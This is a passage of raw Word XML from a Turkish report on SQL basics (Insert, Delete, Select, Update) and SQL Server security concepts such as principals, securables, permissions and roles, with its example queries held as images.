        </w:rPr>
        <w:t>SUPERVISOR yabancı bir anahtardı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7DD60655" wp14:editId="16BDD701">
            <wp:extent cx="3544479" cy="1602557"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Resim 3">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113415AE-46B7-429A-BEFA-8FDFA2178476}"/>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113415AE-46B7-429A-BEFA-8FDFA2178476}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3579242" cy="1618274"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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2.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Insert ve Delete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Oluşturduğumuz Employee tablosu başlangıçta boştur. SQL Insert komutu kullanılarak içine tuple’lar eklenir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Eklenen Tuple’lar Delete komutu kullanılarak silinebili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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BEDF90A" wp14:editId="4377A689">
            <wp:extent cx="3864990" cy="801279"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="Resim 4">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6C8BEA9-11DF-4DF3-9114-1584DC6B9547}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>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6C8BEA9-11DF-4DF3-9114-1584DC6B9547}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3906949" cy="809978"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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2.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL’de verilerin alınması Select komutu ile gerçekleştirilir. Örneğin bilgisayar bilimleri bölümündeki çalışanlar için NAME, SALARU ve SUPERVISOR verileri aşağıdaki komutla getirili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603CAE8F" wp14:editId="13018728">
            <wp:extent cx="2639506" cy="565608"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="15" name="Resim 5">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E080C6-9F5E-4CC2-9FCD-B118B47F75DA}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>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8E080C6-9F5E-4CC2-9FCD-B118B47F75DA}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2737992" cy="586712"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Getirilen verile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3CAACFE4" wp14:editId="7FF626CE">
            <wp:extent cx="2281287" cy="669303"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
            <wp:docPr id="16" name="Resim 6">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5D5E70F-490B-49EF-BEE2-7D3B51C40B26}"/>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5D5E70F-490B-49EF-BEE2-7D3B51C40B26}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2309057" cy="677451"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pP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2.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Update ifadesi varolan bir verinin değiştirilmesi için kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Örneğin aşağıdaki ifade Bilgisayar Bilimleri bölümündeki tüm çalışanlara 1000 dolar zam verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815"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213BA9E5" wp14:editId="08F16FD1">
            <wp:extent cx="2677213" cy="744718"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="17" name="Resim 7">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6874D9-CC8B-4B7F-8CC5-54F4486A89F1}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>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6A6874D9-CC8B-4B7F-8CC5-54F4486A89F1}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2720766" cy="756833"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bu ifade Employee tablosundan istenilen Tuple’ı çekerek Salary sütunundaki verilerin 1000 dolar artmasını sağladı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>2.3 SQL İzinleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Server, verilere, meta verilere ve diğer SQL Server kaynaklarına erişimi kontrol etmek için bir dizi ayar sağlar. SQL Server güvenliği için yeni olan veya güvenliği düzenli olarak yönetmeyenler için, bu ayarların yapılandırılması karmaşık ve kafa karıştırıcı bir işlem gibi görünebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ayarlar doğru yapılırsa sistem güvenli bir şekilde işler fakat yanlış yapılırsa, kullanıcılar ihtiyaç duydukları verilere erişemeyebilir veya daha da kötüsü yetkisiz kullanıcılar hassas bilgilere erişebilir veya kötü niyetli saldırılar yapabilir .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Server'ı etkin bir şekilde korumak için, onaylı kullanıcılara, belirli SQL Server kaynaklarına erişebilmelerini , bu kaynaklardan veya diğer kaynakları etkilemeden, üç önemli bileşen türünün kullanımını içeren bir işlem sunabilmemiz gerekir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>2.4 SQL İzin Bileşenleri</w:t>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4.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>İlkeler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Server kaynaklarına erişmek için kimliği doğrulanabilen varlıklardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Örneğin, Windows giriş bilgileriniz bir SQL Server veritabanına bağlanmanıza izin veren bir ilke olarak yapılandırılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> SQL Server, üç prensip türünü destekler: girişler, kullanıcılar ve roller. Girişler sunucu düzeyinde, kullanıcılar veritabanı düzeyinde bulunur ve roller her iki düzeyde de olabilir.</w:t>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4.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Sağlanabilirler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bir ilke tarafından erişilebilen SQL Server kaynaklarıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Güvenceler, sunucu düzeyinde (örneğin kullanılabilirlik grupları), veritabanı düzeyinde (örneğin tam metin kataloğu) veya şema düzeyinde (ör. Tablo veya işlev) korumaya çalıştığınız gerçek kaynaklardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>İzinler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Belirli bir ilkeye güvenli bir şekilde verilen erişim türleridir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Örneğin, bir Windows oturum açma bilgisine (anapara) belirli bir veritabanı şemasında (güvenli) verileri görüntüleme (izin) yeteneği verilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004068C4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004068C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>2.5 İzinler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Server, üç farklı kapsamda güvenlik altına alınabilir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sunucu kapsamındaki güvenceler, girişler, sunucu rolleri, kullanılabilirlik grupları, bitiş noktaları ve bir bütün olarak veritabanları gibi kaynakları içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Veritabanı kapsamındaki güvenceler, kullanıcılar, veritabanı rolleri, sertifikalar, asimetrik anahtarlar, derlemeler, tam metin kataloglar ve bir bütün olarak şemalar gibi kaynakları içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Şema kapsamındaki güvenceler, tablolar, görünümler, türler, işlevler, prosedürler ve XML şema koleksiyonları gibi kaynakları içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Veritabanı kullanıcı prensipleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bir oturum açma kapsamı bir bütün olarak veritabanı motoruna uygulanır, ancak bireysel veritabanı bileşenlerine erişim sağlamaz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu girişlerle ilişkili kullanıcıların veritabanı kaynaklarına erişebilmesi için, hedef veritabanlarında kullanıcılar oluşturmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="315B4C30" wp14:editId="1686AE2C">
            <wp:extent cx="5760720" cy="1076325"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3175"/>
            <wp:docPr id="30" name="Resim 3">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04E5DA38-C6F3-4F85-BE55-89F997C68EE2}"/>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4E5DA38-C6F3-4F85-BE55-89F997C68EE2}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1076325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00581270" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>2.6 Sunucu ve Veritabanı Rolleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bir oturum açma veya kullanıcı sorumlusu oluşturduktan sonra, sunucu veya veritabanı düzeyinde erişimi kontrol etmek için izinler yapılandırılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
